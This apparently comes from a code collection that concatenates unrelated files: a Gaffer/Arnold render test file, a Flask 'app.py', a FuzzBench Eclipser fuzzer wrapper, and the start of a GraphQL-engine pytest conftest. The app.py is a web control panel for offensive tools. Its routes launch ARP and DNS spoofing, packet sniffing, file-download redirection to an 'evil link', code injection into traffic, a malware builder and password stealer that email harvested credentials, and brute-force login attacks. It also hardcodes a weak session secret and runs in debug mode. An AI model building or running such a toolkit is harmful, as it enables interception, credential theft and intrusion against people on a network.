mix["parameters"]["b"].setInput( green["out"]["out"] )
mix["parameters"]["m"].setValue( 0.5 )
ball = GafferArnold.ArnoldShaderBall()
ball["shader"].setInput( mix["out"] )
catalogue = GafferImage.Catalogue()
outputs = GafferScene.Outputs()
outputs.addOutput(
"beauty",
IECoreScene.Output(
"test",
"ieDisplay",
"rgba",
{
"driverType" : "ClientDisplayDriver",
"displayHost" : "localhost",
"displayPort" : str( catalogue.displayDriverServer().portNumber() ),
"remoteDisplayType" : "GafferImage::GafferDisplayDriver",
}
)
)
outputs["in"].setInput( ball["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( outputs["out"] )
with GafferTest.ParallelAlgoTest.UIThreadCallHandler() as handler :
render["task"].execute()
handler.waitFor( 0.1 ) #Just need to let the catalogue update
self.assertEqual( self.__color4fAtUV( catalogue, imath.V2f( 0.5 ) ), imath.Color4f( 0, 0.5, 0.5, 1 ) )
def testDefaultLightsMistakesDontForceLinking( self ) :
light = GafferArnold.ArnoldLight()
light.loadShader( "point_light" )
sphere = GafferScene.Sphere()
# It doesn't make sense to add a non-light to the "defaultLights"
# set like this, but in the event of user error, we don't want to
# emit light links unnecessarily.
sphereSet = GafferScene.Set()
sphereSet["in"].setInput( sphere["out"] )
sphereSet["name"].setValue( "defaultLights" )
sphereSet["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
group = GafferScene.Group()
group["in"][0].setInput( light["out"] )
group["in"][1].setInput( sphereSet["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightLinkingWarnings( self ) :
# Emulate a meshlight that has been set up sloppily - it is filtered to 4 locations, some actually
# have meshes, some don't
lightSphere = GafferScene.Sphere()
lightInvalid = GafferScene.Group()
lightGroup = GafferScene.Group()
lightGroup["name"].setValue( "lightGroup" )
lightGroup["in"][0].setInput( lightSphere["out"] ) # Has a mesh
lightGroup["in"][1].setInput( lightSphere["out"] ) # Has a mesh
lightGroup["in"][2].setInput( lightInvalid["out"] ) # Doesn't have a mesh
lightGroup["in"][3].setInput( lightInvalid["out"] ) # Doesn't have a mesh
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/lightGroup/*" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( lightGroup["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
geoSphere = GafferScene.Sphere()
geoGroup = GafferScene.Group()
geoGroup["name"].setValue( "geoGroup" )
for i in range( 20 ):
geoGroup["in"][i].setInput( geoSphere["out"] )
group = GafferScene.Group()
group["in"][0].setInput( geoGroup["out"] )
group["in"][1].setInput( meshLight["out"] )
attributeFilter = GafferScene.PathFilter()
attributeFilter["paths"].setValue( IECore.StringVectorData( [ "/group/geoGroup/*" ] ) )
attributes = GafferScene.StandardAttributes()
attributes["in"].setInput( group["out"] )
attributes["filter"].setInput( attributeFilter["out"] )
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
# Link some ( but not all ) lights, so we have to do actual light linking
attributes["attributes"]["linkedLights"]["value"].setValue(
"/group/lightGroup/sphere1 /group/lightGroup/group /group/lightGroup/group1"
)
render = GafferArnold.ArnoldRender()
render["in"].setInput( attributes["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Don't really understand why a regular `with CapturingMessageHandler` doesn't work here
try :
defaultHandler = IECore.MessageHandler.getDefaultHandler()
mh = IECore.CapturingMessageHandler()
IECore.MessageHandler.setDefaultHandler( mh )
render["task"].execute()
finally :
IECore.MessageHandler.setDefaultHandler( defaultHandler )
# We want to see one message per invalid light - not repeated for each location it's referenced at
self.assertEqual( len( mh.messages ), 2 )
mm = [ m.message for m in mh.messages ]
self.assertTrue( "Mesh light without object at location: /group/lightGroup/group" in mm )
self.assertTrue( "Mesh light without object at location: /group/lightGroup/group1" in mm )
def __color4fAtUV( self, image, uv ) :
sampler = GafferImage.ImageSampler()
sampler["image"].setInput( image["out"] )
dw = image['out']["format"].getValue().getDisplayWindow().size()
sampler["pixel"].setValue( uv * imath.V2f( dw.x, dw.y ) )
return sampler["color"].getValue()
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
def testPerformanceMonitorDoesntCrash( self ) :
options = GafferScene.StandardOptions()
options["options"]["performanceMonitor"]["value"].setValue( True )
options["options"]["performanceMonitor"]["enabled"].setValue( True )
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testShaderSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["planeAttrs"] = GafferScene.CustomAttributes()
s["planeAttrs"]["in"].setInput( s["plane"]["out"] )
s["planeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "A", Gaffer.StringPlug( "value", defaultValue = 'bar' ) ) )
s["planeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'foo' ) ) )
s["cube"] = GafferScene.Cube()
s["cubeAttrs"] = GafferScene.CustomAttributes()
s["cubeAttrs"]["in"].setInput( s["cube"]["out"] )
s["cubeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'override' ) ) )
s["parent"] = GafferScene.Parent()
s["parent"]["in"].setInput( s["planeAttrs"]["out"] )
s["parent"]["children"][0].setInput( s["cubeAttrs"]["out"] )
s["parent"]["parent"].setValue( "/plane" )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
s["shader"]["parameters"]["filename"].setValue( "<attr:A>/path/<attr:B>.tx" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["parent"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "photometric_light" )
s["light"]["parameters"]["filename"].setValue( "/path/<attr:A>.ies" )
s["goboTexture"] = GafferArnold.ArnoldShader()
s["goboTexture"].loadShader( "image" )
s["goboTexture"]["parameters"]["filename"].setValue( "<attr:B>/gobo.tx" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["gobo"]["parameters"]["slidemap"].setInput( s["goboTexture"]["out"] )
s["goboAssign"] = GafferScene.ShaderAssignment()
s["goboAssign"]["in"].setInput( s["light"]["out"] )
s["goboAssign"]["shader"].setInput( s["gobo"]["out"] )
s["lightBlocker"] = GafferArnold.ArnoldLightFilter()
s["lightBlocker"].loadShader( "light_blocker" )
s["lightBlocker"]["parameters"]["geometry_type"].setValue( "<attr:geometryType>" )
s["lightGroup"] = GafferScene.Group()
s["lightGroup"]["name"].setValue( "lightGroup" )
s["lightGroup"]["in"][0].setInput( s["goboAssign"]["out"] )
s["lightGroup"]["in"][1].setInput( s["lightBlocker"]["out"] )
s["parent2"] = GafferScene.Parent()
s["parent2"]["in"].setInput( s["shaderAssignment"]["out"] )
s["parent2"]["children"][0].setInput( s["lightGroup"]["out"] )
s["parent2"]["parent"].setValue( "/" )
s["globalAttrs"] = GafferScene.CustomAttributes()
s["globalAttrs"]["in"].setInput( s["parent2"]["out"] )
s["globalAttrs"]["global"].setValue( True )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "A", Gaffer.StringPlug( "value", defaultValue = 'default1' ) ) )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'default2' ) ) )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "geometryType", Gaffer.StringPlug( "value", defaultValue = 'cylinder' ) ) )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["globalAttrs"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
plane = arnold.AiNodeLookUpByName( universe, "/plane" )
shader = arnold.AiNodeGetPtr( plane, "shader" )
self.assertEqual( arnold.AiNodeGetStr( shader, "filename" ), "bar/path/foo.tx" )
cube = arnold.AiNodeLookUpByName( universe, "/plane/cube" )
shader2 = arnold.AiNodeGetPtr( cube, "shader" )
self.assertEqual( arnold.AiNodeGetStr( shader2, "filename" ), "bar/path/override.tx" )
light = arnold.AiNodeLookUpByName( universe, "light:/lightGroup/light" )
self.assertEqual( arnold.AiNodeGetStr( light, "filename" ), "/path/default1.ies" )
gobo = arnold.AiNodeGetPtr( light, "filters" )
goboTex = arnold.AiNodeGetLink( gobo, "slidemap" )
self.assertEqual( arnold.AiNodeGetStr( goboTex, "filename" ), "default2/gobo.tx" )
lightFilter = arnold.AiNodeLookUpByName( universe, "lightFilter:/lightGroup/lightFilter" )
self.assertEqual( arnold.AiNodeGetStr( lightFilter, "geometry_type" ), "cylinder" )
def testEncapsulateDeformationBlur( self ) :
s = Gaffer.ScriptNode()
# Make a sphere where the red channel has the value of the current frame.
s["sphere"] = GafferScene.Sphere()
s["sphereFilter"] = GafferScene.PathFilter()
s["sphereFilter"]["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
s["frame"] = GafferTest.FrameNode()
s["flat"] = GafferArnold.ArnoldShader()
s["flat"].loadShader( "flat" )
s["flat"]["parameters"]["color"].setValue( imath.Color3f( 0 ) )
s["flat"]["parameters"]["color"]["r"].setInput( s["frame"]["output"] )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["sphere"]["out"] )
s["assignment"]["shader"].setInput( s["flat"]["out"] )
s["assignment"]["filter"].setInput( s["sphereFilter"]["out"] )
# Put the sphere in a capsule.
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["assignment"]["out"] )
s["groupFilter"] = GafferScene.PathFilter()
s["groupFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
s["encapsulate"] = GafferScene.Encapsulate()
s["encapsulate"]["in"].setInput( s["group"]["out"] )
s["encapsulate"]["filter"].setInput( s["groupFilter"]["out"] )
# Do a render at frame 1, with deformation blur off.
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
os.path.join( self.temporaryDirectory(), "deformationBlurOff.exr" ),
"exr",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["encapsulate"]["out"] )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["outputs"]["out"] )
s["arnoldOptions"] = GafferArnold.ArnoldOptions()
s["arnoldOptions"]["in"].setInput( s["options"]["out"] )
s["arnoldOptions"]["options"]["aaSamples"]["enabled"].setValue( True )
s["arnoldOptions"]["options"]["aaSamples"]["value"].setValue( 6 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["arnoldOptions"]["out"] )
s["render"]["task"].execute()
# Do another render at frame 1, but with deformation blur on.
s["options"]["options"]["deformationBlur"]["enabled"].setValue( True )
s["options"]["options"]["deformationBlur"]["value"].setValue( True )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["shutter"]["value"].setValue( imath.V2f( -0.5, 0.5 ) )
s["outputs"]["outputs"][0]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOn.exr" ) )
s["render"]["task"].execute()
# Check that the renders are the same.
s["deformationOff"] = GafferImage.ImageReader()
s["deformationOff"]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOff.exr" ) )
s["deformationOn"] = GafferImage.ImageReader()
s["deformationOn"]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOn.exr" ) )
# The `maxDifference` is huge to account for noise and watermarks, but is still low enough to check what
# we want, since if the Encapsulate was sampled at shutter open and not the frame, the difference would be
# 0.5.
self.assertImagesEqual( s["deformationOff"]["out"], s["deformationOn"]["out"], maxDifference = 0.27, ignoreMetadata = True )
def testCoordinateSystem( self ) :
coordinateSystem = GafferScene.CoordinateSystem()
render = GafferArnold.ArnoldRender()
render["in"].setInput( coordinateSystem["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( os.path.join( self.temporaryDirectory(), "test.ass" ) )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, render["fileName"].getValue() )
# Arnold doesn't support coordinate systems, so we don't expect a
# node to have been created for ours.
self.assertIsNone( arnold.AiNodeLookUpByName( universe, "/coordinateSystem" ) )
if __name__ == "__main__":
unittest.main()
|
app.py
|
from flask import Flask, render_template, flash, redirect, url_for, session, logging, request, jsonify
from wtforms import Form, StringField, PasswordField, validators, ValidationError
from passlib.hash import sha256_crypt
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
from werkzeug.security import generate_password_hash, check_password_hash
from hack import change_mac, current_mac, scan, ArpSpoofTask, PacketSniffer, DnsSpoof, Interceptor, brute_force_attack
from code_injector import Injector
from malware import *
from threading import Thread
from crawler import *
import time
from scanner import *
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:@localhost/universell'
db = SQLAlchemy(app)
arp_spoof_attack = ArpSpoofTask()
packet_sniffer = PacketSniffer()
dns_spoof_attack = DnsSpoof()
interceptor = Interceptor()
injector = Injector()
crawler = None
scanner = None
class Users(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=False)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(255))
created_at = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
class RegisterForm(Form):
name = StringField('Name', validators=[validators.DataRequired(), validators.Length(min=4,
max=30)])
email = StringField('Email', validators=[validators.DataRequired(), validators.Email()])
password = PasswordField('Password', validators=[validators.DataRequired()])
password_confirm = PasswordField('Confirm password', validators=[validators.DataRequired(), validators.EqualTo('password', message="Passwords don't match")])
def validate_email(self, email):
user = Users.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Already Taken')
class MainScreen(Form):
target_url= StringField('Target URL', validators=[validators.DataRequired()])
class MacChanger(Form):
interface = StringField('Inteface Name', validators=[validators.DataRequired()])
mac = StringField('MAC', validators=[validators.DataRequired(), validators.Regexp('\w\w:\w\w:\w\w:\w\w:\w\w:\w\w', message="Invalid MAC")])
class LoginForm(Form):
email = StringField('Email', validators=[validators.DataRequired(), validators.Email()])
password = PasswordField('Password', validators=[validators.DataRequired()])
class NetworkScanForm(Form):
ip = StringField('IP Or IP Range', validators=[validators.DataRequired()])
class ArpSpoofingForm(Form):
target_ip = StringField('Target IP', validators=[validators.DataRequired(), validators.Regexp('^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', message="Invalid IP Format")])
spoof_ip = StringField('Spoof IP', validators=[validators.DataRequired(), validators.Regexp('^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', message="Invalid IP Format")])
class PacketSniffingForm(Form):
interface = StringField('Interface', validators=[validators.DataRequired()])
class DnsSpoofingForm(Form):
target_url= StringField('Target URL', validators=[validators.DataRequired()])
spoof_ip = StringField('Spoof IP', validators=[validators.DataRequired(), validators.Regexp('^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', message="Invalid IP Format")])
class FileInterceptorForm(Form):
evil_link = StringField('Evil File Link', validators=[validators.DataRequired()])
class CodeInjectorForm(Form):
code = StringField('Code To Inject', validators=[validators.DataRequired()])
class MalwareForm(Form):
email = StringField('Email', validators=[validators.DataRequired(), validators.Email()])
password = PasswordField('Password', validators=[validators.DataRequired()])
download_link = StringField('Download Link', validators=[validators.DataRequired()])
class CrawlerForm(Form):
url = StringField('URL', validators=[validators.DataRequired()])
class DictionaryForm(Form):
url = StringField('Target URL', validators=[validators.DataRequired()])
username_field = StringField('Username Field Name', validators=[validators.DataRequired()])
pass_field = StringField('Password Field Name', validators=[validators.DataRequired()])
username_guess = StringField('Username Guess', validators=[validators.DataRequired()])
submit_field = StringField('Submit Field Name', validators=[validators.DataRequired()])
@app.route("/")
def index():
return render_template("index.html")
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/blog")
def blog():
return render_template("blog.html")
@app.route("/main", methods=['GET', 'POST'])
def main():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
global scanner
form = MainScreen(request.form)
def scan_vuln():
scanner = 'abc'
work(form.target_url.data)
if request.method == "POST" and form.validate():
t = Thread(target = scan_vuln)
t.start()
flash("Scanning...", 'success')
return render_template("main_screen.html", form = form, results = ['Check console for results'])
return render_template("main_screen.html", form = form)
@app.route("/mac", methods=['GET', 'POST'])
def mac():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = MacChanger(request.form)
if request.method == "POST" and form.validate():
results = change_mac(form.interface.data, form.mac.data)
if(results):
msg = "MAC Address Changed Successfully"
return render_template("mac_changer.html", form=form, msg = msg, results = results)
else:
error = "Operation Was Not Successful"
return render_template("mac_changer.html", form=form, error = error)
return redirect(url_for("mac"))
return render_template("mac_changer.html", form=form)
@app.route("/network", methods=['GET', 'POST'])
def network():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = NetworkScanForm(request.form)
if request.method == "POST" and form.validate():
results = scan(form.ip.data)
if(results):
msg = "Scanned Successfully"
return render_template("network_scanning.html", form=form, msg=msg, results=results)
else:
error = "No Results Found"
return render_template("network_scanning.html", form=form, error= error)
return render_template("network_scanning.html", form=form)
@app.route("/arp", methods=['GET', 'POST'])
def arp_spoof():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = ArpSpoofingForm(request.form)
if request.method == "POST" and form.validate():
if 'restore' in request.form:
msg = "Restore Was Successful"
results = arp_spoof_attack.restore(form.target_ip.data, form.spoof_ip.data)
else:
msg = "ARP Spoofing Was Successful"
results = arp_spoof_attack.launch_arp_spoof(form.target_ip.data, form.spoof_ip.data)
if(results):
arp_spoof_attack.continue_arp_spoof(form.target_ip.data, form.spoof_ip.data)
return render_template("arp_spoof.html", form=form, msg = msg, results = results)
else:
error = "Operation Was Not Successful"
return render_template("arp_spoof.html", form=form, error = error)
return 'SUccess'
return render_template("arp_spoof.html", form=form)
@app.route("/sniff", methods=['GET', 'POST'])
def packet_sniff():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = PacketSniffingForm(request.form)
if request.method == "POST" and form.validate():
if packet_sniffer.continue_packet_sniff(form.interface.data) == "running":
flash("Sniffer Already Running...", "danger")
else:
flash("Packet Sniffing Started Successfully", "success")
return redirect(url_for("packet_sniff"))
return render_template("packet_sniffing.html", form=form)
@app.route('/sniff_array', methods=['GET', 'POST'])
def sniff_array():
results = packet_sniffer.results
return jsonify(results=results)
@app.route('/crawl', methods=['GET', 'POST'])
def crawl():
global crawler
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = CrawlerForm(request.form)
if request.method == "POST" and form.validate():
seedurl = form.url.data
crawler = Crawler(seedurl)
def crawl_sites():
for url in crawler.crawled_urls:
crawler.user_output.append(">>>" +url)
print('>>>', url)
t = Thread(target = crawl_sites)
t.start()
results = 'Crawling...'
flash("Crawler Started Successfully", "success")
return render_template("crawler.html", form=form)
@app.route('/crawl_array', methods=['GET', 'POST'])
def crawl_array():
if crawler:
results = crawler.user_output
return jsonify(results=results)
else:
return ''
@app.route('/scan_array', methods=['GET', 'POST'])
def scan_array():
if scanner:
results = scanner.scan_results
return jsonify(results=results)
else:
'Not initialized'
return ''
@app.route('/clear', methods=['GET', 'POST'])
def clear_sniffed_results():
packet_sniffer.results.clear()
if len(packet_sniffer.results) == 0:
return 'cleared'
return ''
@app.route('/restore_url', methods=['POST'])
def restore_url():
dns_spoof_attack.restore()
flash('URL Restored', 'success')
return ''
@app.route('/drop_connection', methods=['POST'])
def drop_connection():
dns_spoof_attack.drop_connection()
flash('Remote Connection Dropped Successfully', 'success')
return ''
@app.route('/restore_connection', methods=['POST'])
def restore_connection():
dns_spoof_attack.establish_connection()
flash('Remote Connection Restored Successfully', 'success')
return ''
@app.route('/dns', methods=['GET', 'POST'])
def dns_spoof():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = DnsSpoofingForm(request.form)
if request.method == "POST" and form.validate():
try:
if not dns_spoof_attack.url:
dns_spoof_attack.set_forward_chain()
dns_spoof_attack.set_params(form.target_url.data, form.spoof_ip.data)
dns_spoof_attack.bind()
results = "Spoofing DNS response to: " + form.spoof_ip.data
else:
dns_spoof_attack.set_params(form.target_url.data, form.spoof_ip.data)
results = "Spoofing DNS response to: " + form.spoof_ip.data
flash('DNS Spoofing Was Successful', 'success')
except Exception as e:
print(e)
results = ""
flash('Operation Was Not Successful', 'danger')
return render_template("dns_spoof.html", form=form, results = [results])
return render_template("dns_spoof.html", form=form)
@app.route("/file", methods=['GET', 'POST'])
def file_interceptor():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = FileInterceptorForm(request.form)
if request.method == "POST" and form.validate():
interceptor.set_file(form.evil_link.data)
interceptor.enable_forward_chain()
interceptor.bind()
results = [
'Interceptor started successfully...',
'All files will be redirected to: ',
form.evil_link.data
]
flash('File Interception Was Successful', 'success')
return render_template("file_interceptor.html", form=form, results=results)
return render_template("file_interceptor.html", form=form)
@app.route("/code", methods=['GET', 'POST'])
def code_injector():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = CodeInjectorForm(request.form)
if request.method == "POST" and form.validate():
if 'remove' in request.form:
results = ''
injector.remove_injection()
flash('Injector Removed Successfully', 'success')
else:
results = ''
if not injector.injector_running:
injector.enable_forward_chain()
injector.set_injection(form.code.data)
injector.bind()
results = [
'Injector started successfully...'
]
flash('Code Injection Was Successful', 'success')
else:
results = [
'Injector modified successfully...'
]
injector.set_injection(form.code.data)
flash('Code Modification Was Successful', 'success')
return render_template("code_injector.html", form=form, results=results)
return render_template("code_injector.html", form=form)
@app.route("/malware", methods=['GET', 'POST'])
def malware():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = MalwareForm(request.form)
results = ''
if request.method == "POST" and form.validate():
malware = Malware(form.email.data, form.password.data, form.download_link.data)
malware.create()
results = [
'Malware code created successfully...',
'LaZagne download link:--->' + form.download_link.data,
'If you don\'t receive an email, please retry in two minutes'
]
flash('Malware Created Successfully', 'success')
return render_template("malware.html", form=form, results=results)
@app.route("/steal", methods=['GET', 'POST'])
def password_stealer():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = MalwareForm(request.form)
results = ''
if request.method == "POST" and form.validate():
malware = Malware(form.email.data, form.password.data)
malware.create_stealer()
results = [
'Password Stealer created successfully...',
'If you don\'t receive an email, please retry in two minutes'
]
flash('Password Stealer Created Successfully', 'success')
return render_template("password_stealer.html", form=form, results=results)
@app.route("/login", methods=['GET', 'POST'])
def login():
if session.get('logged_in'):
form = MainScreen(request.form)
return render_template("main_screen.html", form = form)
else:
form = LoginForm(request.form)
if request.method == "POST" and form.validate():
user = Users.query.filter_by(email=form.email.data).first()
if user:
if check_password_hash(user.password,form.password.data):
session['logged_in'] = True
session['logged_email'] = form.email.data
return redirect(url_for("main"))
else:
flash('Invalid Email Or Password', 'danger')
return redirect(url_for('login'))
else:
flash('Invalid Email Or Password', 'danger')
return redirect(url_for('login'))
return render_template("login.html", form=form)
@app.route("/dict", methods=['GET', 'POST'])
def dictionary_attack():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = DictionaryForm(request.form)
if request.method == "POST" and form.validate():
results = brute_force_attack(form.url.data, form.username_field.data, form.pass_field.data, form.username_guess.data, form.submit_field.data)
if(results):
msg = "Attacked Successfully"
results = "Success..\n Password--->" + results
return render_template("dictionary_attack.html", form=form, msg=msg, results=[results])
else:
error = "Attack Was Not Successful"
return render_template("dictionary_attack.html", form=form, error= error)
return render_template("dictionary_attack.html", form=form)
@app.route("/register", methods=['GET', 'POST'])
def register():
if session.get('logged_in'):
form = MainScreen(request.form)
return render_template("main_screen.html", form = form)
else:
form = RegisterForm(request.form)
if request.method == "POST" and form.validate():
hashed_password = generate_password_hash(form.password.data, method='sha256')
new_user = Users(name=form.name.data, email=form.email.data, password=hashed_password)
db.session.add(new_user)
db.session.commit()
flash('You are registered successfully and can log in', 'success')
return redirect(url_for("login"))
return render_template("signup.html", form=form)
@app.route("/logout")
def logout():
session.clear()
return redirect(url_for("index"))
app.secret_key = "secret123"
app.run(debug=True)
|
fuzzer.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration code for Eclipser fuzzer. Note that starting from v2.0, Eclipser
relies on AFL to perform random-based fuzzing."""
import os
import shutil
import threading
from fuzzers.aflplusplus import fuzzer as aflplusplus_fuzzer
def build():
"""Build benchmark."""
build_directory = os.getenv('OUT')
aflplusplus_fuzzer.build("tracepc", "cmplog")
shutil.copy('/afl/afl-fuzz', build_directory)
def afl_worker1(input_corpus, output_corpus, target_binary):
"""Run AFL worker instance."""
print('[afl_worker] Run AFL worker1')
aflplusplus_fuzzer.fuzz(input_corpus,
output_corpus,
target_binary,
flags=(['-S', 'afl-worker1']),
no_cmplog=True)
def afl_worker2(input_corpus, output_corpus, target_binary):
"""Run AFL worker instance."""
print('[afl_worker] Run AFL worker2')
aflplusplus_fuzzer.fuzz(input_corpus,
output_corpus,
target_binary,
flags=(['-S', 'afl-worker2']),
skip=True)
def fuzz(input_corpus, output_corpus, target_binary):
"""Run fuzzer."""
if not os.path.isdir(input_corpus):
raise Exception("invalid input directory")
afl_args = (input_corpus, output_corpus, target_binary)
print('[fuzz] Running AFL worker 1')
afl_worker_thread = threading.Thread(target=afl_worker1, args=afl_args)
afl_worker_thread.start()
print('[fuzz] Running AFL workser 2')
eclipser_thread = threading.Thread(target=afl_worker2, args=afl_args)
eclipser_thread.start()
print('[fuzz] Now waiting for threads to finish...')
afl_worker_thread.join()
eclipser_thread.join()
|
conftest.py
|
import pytest
import time
from context import HGECtx, HGECtxError, ActionsWebhookServer, EvtsWebhookServer, HGECtxGQLServer, GQLWsClient, PytestConf
import threading
import random
from datetime import datetime
import sys
import os
from collections import OrderedDict
def pytest_addoption(parser):
parser.addoption(
"--hge-urls",
metavar="HGE_URLS",
help="csv list of urls for graphql-engine",
required=False,
nargs='+'
)
parser.addoption(
"--pg-urls", metavar="PG_URLS",
help="csv list of urls for connecting to Postgres directly",
required=False,
nargs='+'
)
parser.addoption(
"--hge-key", metavar="HGE_KEY", help="admin secret key for graphql-engine", required=False
)
parser.addoption(
"--hge-webhook", metavar="HGE_WEBHOOK", help="url for graphql-engine's access control webhook", required=False
)
parser.addoption(
"--test-webhook-insecure", action="store_true",
help="Run Test cases for insecure https webhook"
)
parser.addoption(
"--hge-jwt-key-file", metavar="HGE_JWT_KEY_FILE", help="File containting the private key used to encode jwt tokens using RS512 algorithm", required=False
)
parser.addoption(
"--hge-jwt-conf", metavar="HGE_JWT_CONF", help="The JWT conf", required=False
)
parser.addoption(
"--test-cors", action="store_true",
required=False,
help="Run testcases for CORS configuration"
)
parser.addoption(
"--test-ws-init-cookie",
metavar="read|noread",
required=False,
help="Run testcases for testing cookie sending over websockets"
)
parser.addoption(
"--test-metadata-disabled", action="store_true",
help="Run Test cases with metadata queries being disabled"
)
parser.addoption(
"--test-graphql-disabled", action="store_true",
help="Run Test cases with GraphQL queries being disabled"
)
parser.addoption(
"--test-hge-scale-url",
metavar="<url>",
required=False,
help="Run testcases for horizontal scaling"
)
parser.addoption(
"--test-allowlist-queries", action="store_true",
help="Run Test cases with allowlist queries enabled"
)
parser.addoption(
